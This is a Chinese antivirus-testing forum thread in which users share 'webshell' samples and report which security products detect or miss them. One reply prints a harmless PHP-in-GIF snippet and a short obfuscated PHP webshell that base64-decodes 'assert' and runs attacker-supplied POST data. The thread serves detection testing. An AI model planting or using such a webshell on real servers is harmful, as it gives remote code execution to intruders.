webshell 2

熊小度

https://cowtransfer.com/s/d3fbf7e5314f40

hhhq316

蜘蛛Miss

GreatMOLA

这两个都没有的恶意行为，只是有非常明显的漏洞。

一个是往GIF里插入PHP代码，但是代码无害（将"BTayqeEL"进行MD5哈希处理）。

1. GIF89a<?php echo md5('BTayqeEL'); ?>

复制代码

一个是利用assert函数企图远程执行代码。

1. <?php
   
2. $f = base64_decode("YX____Nz__ZX__J0");  //解密后为assert高危函数
   
3. $f($_POST[aabyss]);                      //assert($_POST[aabyss]);
   
4. ?>

复制代码

熊小度

GreatMOLA 发表于 2023-9-5 11:10
这两个都没有的恶意行为，只是有非常明显的漏洞。

一个是往GIF里插入PHP代码，但是代码无害（将"BTayqeE ...

https://s.threatbook.com/report/ ... 51187458f78d240ae5e
https://s.threatbook.com/report/ ... 42f670c1e937005a901
eset 报毒了耶
MD kill 1

GreatMOLA

熊小度 发表于 2023-9-5 11:16
https://s.threatbook.com/report/file/5bcd72fbc0da771de2a8ca856cdc69003a0c75644c8db51187458f78d240a ...

报毒也能说得通，因为这些确实是Webshell，可以利用它们执行任何代码或往服务器上传任意恶意内容。

熊小度

GreatMOLA 发表于 2023-9-5 11:17
报毒也能说得通，因为这些确实是Webshell，可以利用它们执行任何代码或往服务器上传任意恶意内容。

https://www.virustotal.com/gui/f ... 37005a901?nocache=1

嗯嗯，也是

初心．杰

诺顿 miss

dght432

心醉咖啡

金山毒霸

骨灰级小白

卡巴miss